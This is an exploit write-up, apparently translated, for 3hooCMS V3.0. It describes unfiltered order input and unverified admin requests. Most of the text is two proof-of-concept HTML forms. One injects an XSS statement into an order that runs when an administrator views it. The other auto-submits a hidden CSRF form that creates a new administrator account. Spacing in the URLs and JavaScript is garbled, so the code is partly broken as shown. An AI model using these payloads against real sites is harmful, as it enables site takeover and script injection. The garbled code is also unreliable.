Author: B0mbErM @ n
Affected Version: 3hooCMSV3.0
Http://www.3hoo.net/
Vulnerability Type: Cross-Site XSS
Vulnerability Description: XSS: The submitted content is not filtered. XSS statements are executed when you view the order in the background.
CSRF: The URL source is not verified. When the management has cookies, you can execute the set statement.
###################### XSS ################# #####
<Style>
. S1 {font-size: 0px; color: # FFFFFF; border: 0px}
</Style>
<Form method = "POST" action = "http: // localhost/SendOrder. Asp">
<Input type = text name = Title size = 32 value = insert XSS statements here>
<Input type = text name = Quantity size = 16 value = 1 class = "s1">
<Option value = "items"> </option>
<Input type = "submit" value = "submit" name = "B1">
</Form>
######################CSRF##################### (Add an administrator)
<Style>
. S1 {font-size: 0px; color: # FFFFFF; border: 0px}
</Style>
<Form method = "POST" action = "http: // localhost/manage/Admin_Send.Asp? Rsend = SendAdmin "name =" FrmMain ">
<Input type = "text" name = "Username" size = "20" value = "Account" class = "s1">
<Input type = "text" name = "Password" size = "20" value = "Password" class = "s1">
<Input type = "submit" name = "B1" value = "B0mbErM @ n" class = "s1"> </form>
<Script>
Document. FrmMain. submit ();
</Script>
Solution: enhance verification and filtering